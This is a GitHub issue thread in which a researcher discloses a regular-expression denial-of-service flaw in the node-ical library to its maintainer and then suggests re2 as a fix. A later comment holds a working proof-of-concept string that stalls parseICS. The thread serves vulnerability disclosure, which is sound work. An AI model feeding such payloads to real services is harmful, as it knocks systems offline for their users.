ReDoS in node-ical

Open yetingli opened this issue 4 years ago • 7 comments

Hey Jens,

Recently I found a potential ReDoS vulnerability inside node-ical and provided some proper examples. You can access the vulnerability details at huntr. Please feel free to get in touch if there are any more issues.

Best regards, Yeting

yetingli avatar Sep 14 '21 09:09 yetingli

Please make this security report public on huntr rather than keeping it private.

jens-maus avatar Sep 14 '21 10:09 jens-maus

Sorry, I don't have permission to make this security report public on huntr. Only after this report is confirmed can it be made public. You can use your GitHub account to log in and access.

yetingli avatar Sep 14 '21 16:09 yetingli

What's wrong in posting this information here directly on GitHub?

jens-maus avatar Sep 14 '21 17:09 jens-maus

Others suggested that I should do a responsible disclosure, that is, I should not open an issue until the report has been validated. Once the report is made public, but not repaired in time, it may pose a certain risk.

yetingli avatar Sep 14 '21 17:09 yetingli

No problem here with that. node-ical is no mission-critical application and I am not a security nerd either. Simply post it and I will see that I will try to review it ASAP.

jens-maus avatar Sep 14 '21 17:09 jens-maus

Thank you for your understanding! I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability. It allows causing a denial of service when calling parseICS.

Proof of Concept

var nodeIcal = require("node-ical")
var str= "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";
nodeIcal.parseICS(str);

yetingli avatar Sep 14 '21 17:09 yetingli

A relatively simple patch, you can use the package re2 (https://www.npmjs.com/package/re2). I hope this can help you.

yetingli avatar Sep 15 '21 09:09 yetingli